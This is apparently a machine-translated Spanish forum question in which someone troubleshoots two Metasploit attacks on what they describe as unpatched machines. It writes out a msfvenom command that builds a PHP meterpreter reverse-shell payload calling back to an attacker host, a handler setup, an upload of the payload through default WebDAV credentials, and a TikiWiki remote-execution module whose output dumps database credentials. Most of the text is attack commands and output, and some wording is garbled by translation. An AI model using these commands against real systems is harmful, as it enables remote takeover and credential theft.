Usando dos exploits diferentes, uno es:
cargue meterpreter.php al servidor web usando las credenciales predeterminadas de WebDav
y el otro es una ejecución remota vuln en tikiwiki.
Para el primer exploit, creé la carga útil utilizando:
msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.86 LPORT=2323 -f raw > meterpreter.php
luego configuro el controlador usando
use multi/handler
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.1.86
set LPORT 2323
exploit
Luego voy a la url del servidor vulnera enlace Lo que me produce la siguiente salida.
[*] Sending stage (34776 bytes) to 192.168.1.111
[*] Meterpreter session 1 opened (192.168.1.86:4444 -> 192.168.1.111:1378) at 2017-08-22 14:05:19 +0100
[*] 192.168.1.111 - Meterpreter session 1 closed. Reason: Died
Luego llega el fondo. Algo que he notado es que a veces, si intento iniciar nuevas sesiones, cambia entre localhost y el conjunto LHOST como:
[*] Meterpreter session 2 opened (127.0.0.1 -> 192.168.1.111:1377) at 2017-08-22 14:05:13 +0100
El segundo ejemplo parece hacer lo mismo con resultados diferentes, ya que ejecuto lo siguiente:
use unix/webapp/tikiwiki_graph_formula_exec
set RHOST 192.168.1.27
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.1.86
exploit
Esto genera la siguiente salida
[*] Started reverse TCP handler on 192.168.1.86:4444
[*] Attempting to obtain database credentials...
[*] The server returned : 200 OK
[*] Server version : Apache/2.2.9 (Ubuntu) PHP/5.2.6-2ubuntu4.6 with Suhosin-Patch
[*] TikiWiki database informations :
db_tiki : mysql
dbversion : 1.9
host_tiki : localhost
user_tiki : tiki
pass_tiki : tikipassword
dbs_tiki : tikiwiki
[*] Attempting to execute our payload...
[*] Exploit completed, but no session was created.
Ambos servidores vuln están sin parchear y son vulnerables. Parece que el medidor de esfuerzo no está enviando el stager correctamente. El servidor web vuln es una máquina xp y el tikiwiki vuln es una caja de ubuntu 8.10.
Cualquier ayuda sería muy apreciada.